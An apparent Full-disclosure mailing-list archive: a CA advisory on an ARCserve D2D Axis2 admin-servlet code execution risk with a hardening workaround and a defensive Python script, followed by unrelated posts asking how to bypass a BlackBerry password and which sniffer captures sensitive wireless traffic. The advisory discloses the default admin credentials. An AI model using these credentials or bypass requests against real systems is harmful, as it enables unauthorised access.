3.  Edit "\TOMCAT\webapps\WebServiceImpl\WEB-INF\web.xml", 
and remove the AxisAdminServlet servlet and servlet-mapping 
entries. 
 
The content to remove will look like the text below:

<servlet>
  <display-name>Apache-Axis Admin Servlet Web Admin</display-name>
  <servlet-name>AxisAdminServlet</servlet-name>
  <servlet-class>org.apache.axis2.transport.http.AxisAdminServlet</servlet-class>
  <load-on-startup>100</load-on-startup>
</servlet>

<servlet-mapping>
  <servlet-name>AxisAdminServlet</servlet-name>
  <url-pattern>/axis2-admin/*</url-pattern>
</servlet-mapping>

4.  Change the username and password parameters in the axis2.xml file 
to stronger credentials that conform to your organization's 
password policies. 
"\TOMCAT\webapps\WebServiceImpl\WEB-INF\conf\axis2.xml"

<parameter name="userName">admin</parameter>
<parameter name="password">axis2</parameter>

5.  Start "CA ARCserve D2D Web Service".


References

CVE-201X- - CVE Reference Pending

CA ARCserve D2D r15 Web Service Apache Axis2 World Accessible Servlet 
Code Execution Vulnerability Poc Dec 30 2010 11:04AM
http://www.securityfocus.com/archive/1/515494/30/0/threaded
http://marc.info/?l=bugtraq&m=129373168501496&w=2

Computer Associates ARCserve D2D r15 Web Service Apache Axis2 World 
Accessible Servlet Code Execution Vulnerability Poc
http://retrogod.altervista.org/9sg_ca_d2d.html


Acknowledgement

rgod


Change History

Version 1.0: Initial Release
Version 2.0: Added patch information


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFNQeWgeSWR3+KUGYURAmdOAJwMqjF7lfNulYGlU9kpBC0/7G7E7gCfSO3z
5v7+N15N6Gbuds7+vrMbRRk=
=zbTD
-END PGP SIGNATURE-



[Full-disclosure] CA20101231-01: Security Notice for CA ARCserve D2D

2010-12-31 Thread Williams, James K
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

CA20101231-01: Security Notice for CA ARCserve D2D
Issued: December 31, 2010

CA Technologies support is alerting customers to a security risk with 
CA ARCserve D2D. A vulnerability exists that can allow a remote 
attacker to execute arbitrary code.  CA has issued an Information 
Solution to address the vulnerability.

The vulnerability is due to weaknesses in the default configuration of 
the third-party Tomcat and Axis2 software components bundled with the 
product. A remote attacker can exploit the implementation to execute 
arbitrary code.


Risk Rating 

High


Platform 

Windows


Affected Products 

CA ARCserve D2D r15


How to determine if the installation is affected 

Using Windows Explorer, go to the directory 
"\TOMCAT\webapps\WebServiceImpl", and look for the existence 
of a folder called "axis2-web".


Solution

A permanent solution will be posted soon at https://support.ca.com/

In the meantime, the following workaround can be implemented to 
address the vulnerability.

1.  Stop "CA ARCserve D2D Web Service" from service control manager.

2.  Go to the directory "\TOMCAT\webapps\WebServiceImpl", and 
remove the folder "axis2-web".

3.  Edit "\TOMCAT\webapps\WebServiceImpl\WEB-INF\web.xml", and 
remove the AxisAdminServlet servlet and servlet-mapping entries. 
 
The content to remove will look like the text below:

<servlet>
  <display-name>Apache-Axis Admin Servlet Web Admin</display-name>
  <servlet-name>AxisAdminServlet</servlet-name>
  <servlet-class>org.apache.axis2.transport.http.AxisAdminServlet</servlet-class>
  <load-on-startup>100</load-on-startup>
</servlet>

<servlet-mapping>
  <servlet-name>AxisAdminServlet</servlet-name>
  <url-pattern>/axis2-admin/*</url-pattern>
</servlet-mapping>

4.  Change the username and password parameters in the axis2.xml file 
to stronger credentials that conform to your organization's password 
policies. 
"\TOMCAT\webapps\WebServiceImpl\WEB-INF\conf\axis2.xml"

<parameter name="userName">admin</parameter>
<parameter name="password">axis2</parameter>

5.  Start "CA ARCserve D2D Web Service".
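The five-step workaround (it appears in both postings of CA20101231-01 above) lends itself to scripting, and scripting it is also the easiest way to verify on a copy of the files that only the intended elements change. The following Python is an added example, not CA's own tooling: it automates steps 2 to 4 against the WebServiceImpl directory and leaves stopping and restarting "CA ARCserve D2D Web Service" (steps 1 and 5) to the Service Control Manager. The sample web.xml and axis2.xml are constructed and cut down to the elements the advisory names; the real files carry much more. The d2dadmin username, the demo function and the assumption that the admin credentials live in <parameter name="userName"> and <parameter name="password"> elements are assumptions of this example. Back up both XML files before running it against a live install.

```python
import secrets
import shutil
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

ADMIN_SERVLET = "AxisAdminServlet"  # servlet name quoted in the advisory
ADMIN_FOLDER = "axis2-web"          # folder whose presence marks an affected install

# Constructed samples (not CA's real files), cut down to what the workaround touches.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>AxisServlet</servlet-name>
    <servlet-class>org.apache.axis2.transport.http.AxisServlet</servlet-class>
  </servlet>
  <servlet>
    <display-name>Apache-Axis Admin Servlet Web Admin</display-name>
    <servlet-name>AxisAdminServlet</servlet-name>
    <servlet-class>org.apache.axis2.transport.http.AxisAdminServlet</servlet-class>
    <load-on-startup>100</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>AxisAdminServlet</servlet-name>
    <url-pattern>/axis2-admin/*</url-pattern>
  </servlet-mapping>
</web-app>
"""
SAMPLE_AXIS2_XML = """<axisconfig name="AxisJava2.0">
  <parameter name="hotdeployment">true</parameter>
  <parameter name="userName">admin</parameter>
  <parameter name="password">axis2</parameter>
</axisconfig>
"""

def _local(tag):
    # Local tag name without any "{namespace}" prefix; "" for comment nodes.
    return tag.rsplit("}", 1)[-1] if isinstance(tag, str) else ""

def _parse(text):
    # Keep comments, and keep a default xmlns readable when re-serialised.
    root = ET.fromstring(text, parser=ET.XMLParser(target=ET.TreeBuilder(insert_comments=True)))
    if root.tag.startswith("{"):
        ET.register_namespace("", root.tag[1:root.tag.index("}")])
    return root

def _serialize(original, root_name, root):
    # Re-attach the <?xml ...?>/DOCTYPE prolog that ElementTree discards.
    idx = original.find("<" + root_name)
    return (original[:idx] if idx > 0 else "") + ET.tostring(root, encoding="unicode")

def is_affected(webapp_dir):
    # The advisory's check: the Axis2 admin web UI folder is still deployed.
    return Path(webapp_dir, ADMIN_FOLDER).is_dir()

def strip_admin_servlet(web_xml, servlet_name=ADMIN_SERVLET):
    # Step 3: drop every <servlet>/<servlet-mapping> whose <servlet-name> matches.
    root = _parse(web_xml)
    doomed = [c for c in root if _local(c.tag) in ("servlet", "servlet-mapping")
              and any(_local(n.tag) == "servlet-name" and (n.text or "").strip() == servlet_name
                      for n in c)]
    for child in doomed:
        root.remove(child)
    return _serialize(web_xml, "web-app", root), len(doomed)

def set_admin_credentials(axis2_xml, username, password):
    # Step 4: overwrite the default userName/password <parameter> values (assumed element names).
    root = _parse(axis2_xml)
    wanted = {"userName": username, "password": password}
    hits = [e for e in root.iter() if _local(e.tag) == "parameter" and e.get("name") in wanted]
    for e in hits:
        e.text = wanted[e.get("name")]
    if {e.get("name") for e in hits} != set(wanted):
        raise ValueError("axis2.xml has no userName/password parameters to replace")
    return _serialize(axis2_xml, "axisconfig", root)

def apply_workaround(webapp_dir, username="d2dadmin", password=None):
    # Steps 2-4 on disk; steps 1 and 5 (stop/start the D2D web service) stay with
    # the Service Control Manager. Returns the password set, so it can be vaulted.
    password = password or secrets.token_urlsafe(24)
    admin_ui = Path(webapp_dir, ADMIN_FOLDER)
    if admin_ui.is_dir():
        shutil.rmtree(admin_ui)                                            # step 2
    web_xml = Path(webapp_dir, "WEB-INF", "web.xml")
    web_xml.write_text(strip_admin_servlet(web_xml.read_text(encoding="utf-8"))[0], encoding="utf-8")
    axis2 = Path(webapp_dir, "WEB-INF", "conf", "axis2.xml")
    axis2.write_text(set_admin_credentials(axis2.read_text(encoding="utf-8"), username, password),
                     encoding="utf-8")
    return password

def demo():
    # Build a throwaway WebServiceImpl tree from the samples, check it, harden it, re-check.
    with tempfile.TemporaryDirectory() as tmp:
        conf = Path(tmp, "WEB-INF", "conf")
        conf.mkdir(parents=True)
        Path(tmp, ADMIN_FOLDER).mkdir()
        (conf.parent / "web.xml").write_text(SAMPLE_WEB_XML, encoding="utf-8")
        (conf / "axis2.xml").write_text(SAMPLE_AXIS2_XML, encoding="utf-8")
        before = is_affected(tmp)
        apply_workaround(tmp)
        return before, is_affected(tmp)  # (True, False)
```

On a live system, point apply_workaround at the WebServiceImpl directory between stopping and restarting the service and record the returned password in the organisation's vault. The two XML helpers are pure functions, so they can first be run over copies of the real web.xml and axis2.xml and the results diffed against the originals to confirm that nothing besides the AxisAdminServlet entries and the two credential parameters changed; set_admin_credentials deliberately fails if it cannot find both parameters rather than silently leaving the defaults in place.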


References

CVE-201X- - CVE Reference Pending

CA ARCserve D2D r15 Web Service Apache Axis2 World Accessible Servlet 
Code Execution Vulnerability Poc Dec 30 2010 11:04AM
http://www.securityfocus.com/archive/1/515494/30/0/threaded
http://marc.info/?l=bugtraq&m=129373168501496&w=2

Computer Associates ARCserve D2D r15 Web Service Apache Axis2 World 
Accessible Servlet Code Execution Vulnerability Poc
http://retrogod.altervista.org/9sg_ca_d2d.html


Acknowledgement

rgod


Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.16 (MingW32)

iEYEARECAAYFAk0eRkEACgkQeSWR3+KUGYVuvQCgkCI+mqnFSazvhzN8anG9dPEu
4GEAoJeHEInf6VzrioKGscIj5J0xq+Mb
=XuTb
-END PGP SIGNATURE-



Re: [Full-disclosure] looking for enterprise AV solution

2010-10-27 Thread James Rankin
Ditto on the belt and braces approach.

I've had a lot of good experiences with Sunbelt's Vipre product. It is
extremely easy to deploy and manage in the enterprise.

On 27 October 2010 11:32, Jamie Riden  wrote:

> On 26 October 2010 19:26, bk  wrote:
> > (resending from correct account)
> > On Oct 26, 2010, at 6:55 AM, Mikhail A. Utin wrote:
> >
> >> Folks,
> >> We are looking an enterprise level AV-software . Any advising?
> >
> > Signature-based AV is a dead technology.  Updates don't get released
> until hours after you're already infected, so all it really ends up doing is
> being a resource-suck on your CPUs and hard-disk access.
> >
> > My recommendation:  Buy whatever has the highest composite score for ease
> of management, limited resource consumption, and affordability.
> >
> > Anyone who says "get Vendor X" or "get Brand Y" without telling you what
> selection criteria they used is a tool.  How do you know if what is
> important to you was also important to them in making the selection?
>
> If you've got a decent perimeter, it should keep the threats out for
> some time, but I tend to agree. AV these days is starting to be more
> about detection than prevention - it will at least highlight that you
> have a problem so you can deal with it. Think of it as part of your
> intrusion detection if it helps.
>
> Oh, and somewhere I used to work ran two separate AV products on the
> mail gateway, and then a third on desktops on servers. I suspect this
> was more about licensing models (couldn't do per-seat for email as we
> had >100k email addresses) than paranoia, but it did help out
> considerably to have independent engines.
>
> cheers,
>  Jamie
> --
> Jamie Riden / ja...@honeynet.org / jamie.ri...@gmail.com
> http://uk.linkedin.com/in/jamieriden
>
>




[Full-disclosure] Need some direction

2010-10-04 Thread James Lay
Hello all.

So I've been tasked with discovering exactly how some malicious
java_cache.tmp files got to a users drive.  Am I on the right track
by guessing these were created by a malicious .jar file?  Thanks for the
direction.

James



Re: [Full-disclosure] Apple CoreGraphics (Preview) Memory Corruption Vulnerability - CVE-2010-1801

2010-08-27 Thread James Craig
Hello,
this bug looks like *((int*)0, why was it marked as a heap overflow?
Best,
James.

[Full-disclosure] PacketStorm

2010-06-22 Thread james
Anyone know what happen to packetstorm.org 
 
The site is down!
 
 

James Smith
Email: ja...@smithwaysecurity.com
Website: www.smithwaysecurity.com
Phone Number: (877) 352-6665

**The information contained in this message may be privileged and is confidential information intended for the use of the addressee listed above. If you are neither the intended recipient nor the employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any disclosure copying, distribution or the taking of any action in reliance on the contents of this information is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer.


[Full-disclosure] Blackberry pwd hack or reset

2010-06-03 Thread james

Hello everyone;

I was given a black berry is their a method To hack or reset the  
password without an OS reinstallation?


Sent from my iPhone



[Full-disclosure] Blackberry pwd hack or reset

2010-06-03 Thread james
Hello everyone;

Not sure if my first email went though.

Well I was given a blackberry which was locked.

  I was woundering if their was another method to hack or reset a  
black berry password without an OS reinstallation?


Sent from my iPhone



Re: [Full-disclosure] Security Focus down?

2010-05-17 Thread James Lay
> No doesn't seems like that. It's fine and up with no problems.
>
> Pradip
>
> On Mon, May 17, 2010 at 9:33 PM, James Lay 
> wrote:
>
>> So...all my feeds and web access to Security Focus have tanked over this
>> weekendanyone know if they are getting DoS'd or anything like that?
>>
>> James
>>
>>
>

Well I'll be darned..it is up now...sweet.

James



[Full-disclosure] Security Focus down?

2010-05-17 Thread James Lay
So...all my feeds and web access to Security Focus have tanked over this
weekendanyone know if they are getting DoS'd or anything like that?

James



[Full-disclosure] Israel IP range legit or false?

2010-04-28 Thread james
Hello everyone:

Tonight I was looking through some look information I had saved on a hard
drive when I came across a few IP ranges.

IP ranges:
212.143 *** i
212.149
212.159.0.2
212.159.1.1
212.159.1.4
212.179.*** Israelis isp's)
212.208.0.12
213.8.***.***

What I am not getting is: did they update their IP ranges, or are they
using some of them as fronts? Here's an example: (212.159.0.3 should be an
Israel IP unless they updated; if not, then they are using it as a front
for some type of information storage.)
London Telehouse LAN)
London Telehouse L2TP)

(What I would like to know is: are these the real IP ranges, or were they
the old ones before being updated?)

James Smith
Email: ja...@smithwaysecurity.com
Website: www.smithwaysecurity.com
Phone Number: (877) 352-6665


Re: [Full-disclosure] Best Wireless Sniffer for MAC OS X

2010-04-13 Thread James Lay
From: Justin Chang 
Date: Tue, 13 Apr 2010 14:41:36 +
To: Full-disclosure ,

Subject: [Full-disclosure] Best Wireless Sniffer for MAC OS X

Hello group

What are some of the best wireless sniffers on MAC OS X platform? I want to
be able to sniff the traffic and look for sensitive information. The company
has a small budget so both free and commercial are fine

Thanks 


Justin,

Compile kismet (works for me on SL 10.6.3) or use Kismac for a more gui
flavor.

James

[Full-disclosure] Security system

2010-03-27 Thread james
Any one got any ides how I would program a system to call me from a  
voip network to alert me of a home security breach.

Sent from my iPhone


